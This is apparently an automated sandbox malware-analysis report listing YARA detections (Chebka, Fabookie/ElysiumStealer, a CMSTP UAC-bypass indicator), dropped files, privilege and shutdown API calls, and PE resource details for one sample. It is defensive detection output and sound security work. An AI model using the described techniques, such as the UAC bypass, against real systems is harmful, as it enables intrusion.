                Source: C:\Windows\System32\VSSVC.exeSection loaded: edgegdi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: edgegdi.dll
                Source: Joe Sandbox ViewDropped File: :y (copy) 3E26723394ADE92F8163B5643960189CB07358B0F96529A477D37176D68AA0A0
                Source: l39HA25qjw.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 40.2.svchost.exe.1f19b330000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
                Source: 40.2.svchost.exe.1f19b330000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
                Source: 40.2.svchost.exe.1f19b330000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
                Source: 35.0.svchost.exe.2546f070000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
                Source: 35.0.svchost.exe.2546f070000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
                Source: 35.0.svchost.exe.2546f070000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
                Source: 35.2.svchost.exe.2546f070000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
                Source: 35.2.svchost.exe.2546f070000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
                Source: 35.2.svchost.exe.2546f070000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
                Source: 37.0.DMLnyt.dc0000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 37.0.DMLnyt.dc0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 37.0.DMLnyt.dc0000.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 37.2.DMLnyt.dc0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 38.2.svchost.exe.19809ad0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
                Source: 38.2.svchost.exe.19809ad0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
                Source: 38.2.svchost.exe.19809ad0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
                Source: 40.0.svchost.exe.1f19b330000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
                Source: 40.0.svchost.exe.1f19b330000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
                Source: 40.0.svchost.exe.1f19b330000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
                Source: 37.0.DMLnyt.dc0000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 34.2.rundll32.exe.3440000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
                Source: 34.2.rundll32.exe.3440000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Fabookie author = ditekSHen, description = Detects Fabookie / ElysiumStealer
                Source: 34.2.rundll32.exe.3440000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
                Source: 34.2.rundll32.exe.3440000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
                Source: 37.0.DMLnyt.dc0000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 37.0.DMLnyt.dc0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 40.2.svchost.exe.1f19b330000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
                Source: 40.2.svchost.exe.1f19b330000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
                Source: 40.2.svchost.exe.1f19b330000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
                Source: 38.2.svchost.exe.19809ad0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
                Source: 38.2.svchost.exe.19809ad0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
                Source: 38.2.svchost.exe.19809ad0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
                Source: 35.2.svchost.exe.2546f070000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
                Source: 35.2.svchost.exe.2546f070000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
                Source: 35.2.svchost.exe.2546f070000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
                Source: 35.0.svchost.exe.2546f070000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
                Source: 35.0.svchost.exe.2546f070000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
                Source: 35.0.svchost.exe.2546f070000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
                Source: 40.0.svchost.exe.1f19b330000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
                Source: 40.0.svchost.exe.1f19b330000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
                Source: 40.0.svchost.exe.1f19b330000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
                Source: 00000026.00000003.42895486469.000001980989B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
                Source: 00000022.00000002.42906398248.0000000003484000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
                Source: 00000022.00000002.42906398248.0000000003484000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
                Source: 00000026.00000002.47260101856.000001980984E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
                Source: 00000026.00000003.43145351405.000001980989B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
                Source: 00000014.00000002.47264959654.0000000002720000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
                Source: 00000028.00000003.42858002035.000001F19B2C0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
                Source: 00000028.00000003.42858002035.000001F19B2C0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
                Source: 00000026.00000002.47279054659.000001980C240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
                Source: 00000026.00000002.47279054659.000001980C240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
                Source: 00000023.00000003.42828619711.000002546F000000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
                Source: 00000023.00000003.42828619711.000002546F000000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
                Source: 00000026.00000002.47268428455.000001980BB00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
                Source: 00000026.00000003.43128837241.000001980BB03000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
                Source: 00000026.00000003.42946894366.000001980989B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
                Source: 00000026.00000002.47256793876.0000019809780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
                Source: 00000026.00000002.47256793876.0000019809780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
                Source: 00000026.00000002.47262482230.00000198098A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
                Source: 00000022.00000002.42904144469.00000000033A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
                Source: 00000022.00000002.42904144469.00000000033A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Fabookie author = ditekSHen, description = Detects Fabookie / ElysiumStealer
                Source: 00000022.00000002.42904144469.00000000033A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
                Source: 00000023.00000002.47258097025.000002546F070000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
                Source: 00000023.00000002.47258097025.000002546F070000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
                Source: 00000023.00000002.47258097025.000002546F070000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
                Source: 00000028.00000002.43311174793.000001F19B330000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
                Source: 00000028.00000002.43311174793.000001F19B330000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
                Source: 00000028.00000002.43311174793.000001F19B330000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
                Source: 00000023.00000000.42836378036.000002546F070000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
                Source: 00000023.00000000.42836378036.000002546F070000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
                Source: 00000023.00000000.42836378036.000002546F070000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
                Source: 00000028.00000000.42868569534.000001F19B330000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
                Source: 00000028.00000000.42868569534.000001F19B330000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
                Source: 00000028.00000000.42868569534.000001F19B330000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
                Source: 00000026.00000002.47264376081.0000019809AD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
                Source: 00000026.00000002.47264376081.0000019809AD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
                Source: 00000026.00000002.47264376081.0000019809AD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\mp3studios_6[1].exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: C:\Users\user\AppData\Local\Temp\BmJXgWaKpkcZyvlBVT\DMLnyt, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: C:\Users\user\Desktop\l39HA25qjw.exeCode function: 1_2_00401F9B GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,1_2_00401F9B
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00ECF018 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,13_2_00ECF018
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 19_2_00ECF018 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,19_2_00ECF018
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: String function: 00E67E4C appears 33 times
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: String function: 00E6A1B9 appears 60 times
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: String function: 00E80CB0 appears 92 times
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: String function: 00E84BE3 appears 62 times
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: String function: 00E8908B appears 36 times
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: String function: 00E93226 appears 48 times
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: String function: 00EA21D0 appears 55 times
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: String function: 00E66653 appears 34 times
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: String function: 00E7FC68 appears 81 times
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: String function: 00E84CA8 appears 42 times
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00ED456E: GetFullPathNameW,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,13_2_00ED456E
                Source: fwrhglUiBb.dll.13.drStatic PE information: Resource name: RT_MESSAGETABLE type: a.out little-endian 32-bit pure executable not stripped
                Source: mp3studios_6[1].exe.20.drStatic PE information: Resource name: ZIP type: Zip archive data, at least v1.0 to extract
                Source: setup[1].exe.20.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, 453771 bytes, 1 file
                Source: DMLnyt.20.drStatic PE information: Resource name: ZIP type: Zip archive data, at least v1.0 to extract
                Source: xfQBIg.20.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, 453771 bytes, 1 file
                Source: FagLhQ.tmp.21.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                Source: is-03UQT.tmp.22.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
